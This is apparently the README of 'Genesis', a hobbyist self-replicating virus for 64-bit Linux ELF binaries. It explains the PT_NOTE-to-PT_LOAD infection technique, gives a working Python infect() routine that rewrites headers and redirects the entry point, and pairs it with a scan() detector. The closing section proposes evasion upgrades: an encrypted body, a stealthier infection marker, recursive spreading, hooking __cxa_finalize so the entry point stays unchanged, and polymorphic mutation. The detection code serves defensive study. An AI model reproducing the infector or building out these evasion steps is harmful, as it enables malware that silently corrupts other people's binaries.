An ELF Virus Leveraging The PT_NOTE to PT_LOAD Technique.
This is my first virus for 64-bit Linux ELF binaries. It infects every
64-bit ELF binary in the current directory (non-recursively) using the
PT_NOTE->PT_LOAD technique: the PT_NOTE program header, which the loader
does not need, is rewritten into an executable PT_LOAD segment that maps the
virus body appended to the end of the file, and e_entry is redirected to it.
The payload only displays a short message.
Every infected binary is marked with the string GNS in the unused padding
bytes of the ELF header (e_ident[EI_PAD]).
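To make the PT_NOTE->PT_LOAD mechanics and the GNS marker concrete, the following is an added example written for this page; it is not the Genesis source and does not reproduce its assembly. It performs the header rewrite on an in-memory ELF64 image and, alongside it, scans an image for the traces such an infection leaves. The minimal sample image, the 0x0C000000 load base and the scan heuristics are assumptions of the example, not something the project specifies.

```python
"""PT_NOTE -> PT_LOAD infection and detection on an in-memory ELF64 image.

Example code written for this page; it is not the Genesis source. The sample
image, the 0x0C000000 load base and the scan heuristics are assumptions.
"""
import struct

EHDR_FMT = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr, little-endian, 64 bytes
PHDR_FMT = "<IIQQQQQQ"          # Elf64_Phdr, 56 bytes
PT_LOAD, PT_NOTE = 1, 4
PF_X, PF_W, PF_R = 1, 2, 4
EI_PAD = 9                      # first of the 7 unused e_ident padding bytes
PAGE = 0x1000
MARKER = b"GNS"                 # infection marker used by Genesis

EH_FIELDS = ("ident", "type", "machine", "version", "entry", "phoff", "shoff",
             "flags", "ehsize", "phentsize", "phnum", "shentsize", "shnum", "shstrndx")
PH_FIELDS = ("type", "flags", "offset", "vaddr", "paddr", "filesz", "memsz", "align")


def parse(elf):
    """Return (ehdr dict, list of phdr dicts) for a raw little-endian ELF64 image."""
    eh = dict(zip(EH_FIELDS, struct.unpack_from(EHDR_FMT, elf, 0)))
    if eh["ident"][:5] != b"\x7fELF\x02":
        raise ValueError("not an ELF64 image")
    phdrs = [dict(zip(PH_FIELDS, struct.unpack_from(PHDR_FMT, elf, eh["phoff"] + i * eh["phentsize"])))
             for i in range(eh["phnum"])]
    return eh, phdrs


def infect(elf, payload, base=0x0C000000):
    """PT_NOTE -> PT_LOAD: append payload, rewrite the PT_NOTE header into an R+X PT_LOAD
    that maps it, point e_entry at it and write the marker. A real payload must end with
    a jump back to the original e_entry; the bytes passed here are arbitrary."""
    eh, phdrs = parse(elf)
    if eh["ident"][EI_PAD:EI_PAD + len(MARKER)] == MARKER:
        raise ValueError("already infected")
    notes = [i for i, p in enumerate(phdrs) if p["type"] == PT_NOTE]
    if not notes:
        raise ValueError("no PT_NOTE header to hijack")
    off = len(elf)                      # payload is appended at end of file
    vaddr = base + off                  # base is page-aligned, so vaddr == off (mod PAGE)
    out = bytearray(elf) + payload
    out[EI_PAD:EI_PAD + len(MARKER)] = MARKER
    struct.pack_into("<Q", out, 24, vaddr)  # e_entry now points at the payload
    struct.pack_into(PHDR_FMT, out, eh["phoff"] + notes[0] * eh["phentsize"],
                     PT_LOAD, PF_R | PF_X, off, vaddr, vaddr, len(payload), len(payload), PAGE)
    return bytes(out)


def scan(elf):
    """Indicators of a PT_NOTE -> PT_LOAD infection; each value is True when suspicious."""
    eh, phdrs = parse(elf)
    loads = [p for p in phdrs if p["type"] == PT_LOAD]
    entry_seg = next((p for p in loads
                      if p["vaddr"] <= eh["entry"] < p["vaddr"] + p["memsz"]), None)
    exec_loads = sorted((p for p in loads if p["flags"] & PF_X), key=lambda p: p["vaddr"])
    return {
        "marker": eh["ident"][EI_PAD:EI_PAD + len(MARKER)] == MARKER,
        "no_pt_note": not any(p["type"] == PT_NOTE for p in phdrs),
        # appended code: the segment holding e_entry runs up to the last byte of the file
        "entry_segment_at_eof": entry_seg is not None
        and entry_seg["offset"] + entry_seg["filesz"] == len(elf),
        # e_entry lives outside the lowest-mapped executable segment (normally .text)
        "entry_not_in_first_exec": bool(exec_loads) and entry_seg is not exec_loads[0],
    }


def build_clean_sample():
    """Constructed minimal ELF64 image (not a runnable program): one R+X PT_LOAD
    covering header, code and note, then a trailing section-header area."""
    code_off, note_off, load_size, size = 0x100, 0x180, 0x1A0, 0x200
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7
    img = bytearray(size)
    struct.pack_into(EHDR_FMT, img, 0, ident, 2, 0x3E, 1, 0x400000 + code_off,
                     64, load_size, 0, 64, 56, 2, 64, 1, 0)
    struct.pack_into(PHDR_FMT, img, 64, PT_LOAD, PF_R | PF_X,
                     0, 0x400000, 0x400000, load_size, load_size, PAGE)
    struct.pack_into(PHDR_FMT, img, 64 + 56, PT_NOTE, PF_R, note_off,
                     0x400000 + note_off, 0x400000 + note_off, 0x20, 0x20, 4)
    img[code_off:code_off + 2] = b"\x0f\x05"  # placeholder code bytes
    return bytes(img)


if __name__ == "__main__":
    clean = build_clean_sample()
    bad = infect(clean, b"\x90" * 8)
    print("clean:", scan(clean))
    print("infected:", scan(bad))
```

Two details matter in infect: the new segment's p_vaddr is chosen as base + file offset so that vaddr and offset agree modulo the page size, which the loader requires for a PT_LOAD, and the marker check at the top is the same role the GNS bytes play in the header padding. On the detection side, the marker alone is trivial to change; the structural indicators (no PT_NOTE left, e_entry pointing into a segment that ends exactly at EOF and is not the lowest executable mapping) survive a renamed marker, which is the check a responder would run across a directory of binaries.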
Warning
Even though the payload itself is harmless, this binary modifies every 64-bit ELF in the directory it is run from, so run it at your own risk. I am not in any way, shape or form responsible for the damages you cause with this.
That being said, please don't spread this out in the wild. :)
Building the project is straightforward:

```sh
# For standard assembling:
make
# For assembling with debug info:
make debug
```

The resulting binary will be created in bin/.
< demo-video placeholder >
The project is structured in the following way:

```
.
├── Makefile
├── README.md        <-- You are here :)
├── src
│   ├── Genesis.asm  <-- The actual virus source
│   ├── Macros.asm   <-- Helper macros
│   └── Structs.asm  <-- Struct definitions
└── test
    └── target       <-- 'Hello World' binary for testing purposes
```

Because the virus was a quick side project, it is deliberately simple and
there is a lot to improve. The payload, or the whole virus body, could be
encrypted on disk and decrypted at runtime. A less conspicuous way to
watermark infected files could replace overwriting the ELF header padding,
which any header parser can spot. The file-enumeration logic could be
rewritten to recurse into directories. Finally, instead of overwriting the
e_entry value, one could hook __cxa_finalize so that the entry point, which
is the first thing a scanner compares, stays untouched.
Further Ideas:
- Mutation engine via basic block shuffling
- Encryption via simple XOR
- Compression using the ZX0 algorithm (decompress backwards to save memory)